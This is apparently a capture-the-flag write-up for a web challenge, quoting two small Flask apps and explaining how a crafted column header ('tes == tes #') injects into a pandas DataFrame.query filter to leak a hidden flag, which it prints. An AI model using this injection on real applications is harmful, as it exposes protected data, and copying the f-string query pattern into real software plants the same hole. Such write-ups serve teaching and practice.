web/rnd-data-science

Date, Time: Monday, 31-05-2024

Summary

The flag is actually written in the csv, but the code identifies the second column in the DataFrame and filters out rows where the value in this column is "FLAG". This ensures that any row with "FLAG" in the second column is excluded from further processing or display, preventing the flag from being shown.

To bypass this validation, you can inject a malicious second column header name such as tes == tes # and make the third column header tes. The # character comments out the != "FLAG" condition, and tes == tes creates a query that is always true because the value in the tes column is always equal to itself. This effectively bypasses the filter and allows all rows to be processed, including those containing the flag.

Solving

Given app.py and generator_app.py.

app.py

from flask import Flask, request, send_file
from io import StringIO, BytesIO
import pandas as pd
import requests

app = Flask(__name__)


@app.route("/")
def index():
    return app.send_static_file('index.html')


@app.route("/generate", methods=['POST'])
def generate():
    data = request.form
    delimiter_const = 'delimiter'
    r = requests.post('http://127.0.0.1:5001', data=data)

    if r.text == 'ERROR':
        return 'ERROR'

    csv = StringIO(r.text)

    df = pd.read_csv(csv)

    # Filter out secrets
    first = list(df.columns.values)[1]
    df = df.query(f'{first} != "FLAG"')

    string_df = StringIO(df.to_csv(index=False, sep=data[delimiter_const]))
    bytes_df = BytesIO()
    bytes_df.write(string_df.getvalue().encode())
    bytes_df.seek(0)

    return send_file(bytes_df, download_name="data.csv")

generator_app.py

from flask import Flask, request
import random as rnd

app = Flask(__name__)

flag = open('flag.txt', 'r').read().rstrip()


@app.route("/", methods=['POST'])
def index():
    delimiter = request.form['delimiter']

    if len(delimiter) > 1:
        return 'ERROR'

    num_columns = int(request.form['numColumns'])
    if num_columns > 10:
        return 'ERROR'

    headers = ['id'] + [request.form["columnName" + str(i)] for i in range(num_columns)]

    forb_list = ['and', 'or', 'not']

    for header in headers:
        if len(header) > 120:
            return 'ERROR'
        for c in '\'"!@':
            if c in header:
                return 'ERROR'
        for forb_word in forb_list:
            if forb_word in header:
                return 'ERROR'

    csv_file = delimiter.join(headers)

    for i in range(10):
        row = [str(i)] + [str(rnd.randint(0, 100)) for _ in range(num_columns)]
        csv_file += '\n' + delimiter.join(row)

    row = [str('NaN')] + ['FLAG'] + [flag] + [str(0) for _ in range(num_columns)]
    csv_file += '\n' + delimiter.join(row[:len(headers)])

    return csv_file

app.py scripts will run a python server that will request a CSV generated from generator_app.py python server. generator_app.py python server will generate a custom csv with random value in it. The columns header will be created from the user input. Lastly the generator_app.py will add the flag as the last data in the CSV and return it to the requester.

app.py python server will receive the CSV file and take the second column header names. the second column header will be used to filter out the FLAG.

The .query method takes a boolean expression and filters out any rows that do not match the expression. Here, if the user input for the first column is "num1", then the variable first will be assigned "num1". The .query method then uses the boolean expression num1 != "FLAG". This query looks for values in the "num1" column and compares them with the string "FLAG". If a value does not meet the boolean expression, the row will be filtered out.

The idea I used to solve this challenge is to consider, "What if the user input for the second column name is malicious?" A simple malicious payload that could alter the entire boolean expression that the .query method evaluates.

The user input for the second column name will be "tes == tes #" and the third column name will be "tes". The second column name is a malicious payload that will compare the value of the "tes" column with itself, which will always be true. Hence, the flag will not be filtered out. The # is used to comment out the "!= FLAG" expression hardcoded in the backend.

Flag

TBTL{d4T4_5c13nc3_15_n07_f0r_r0ck135}

Previousweb/butterfly Nextmisc/your papers please

Last updated 1 year ago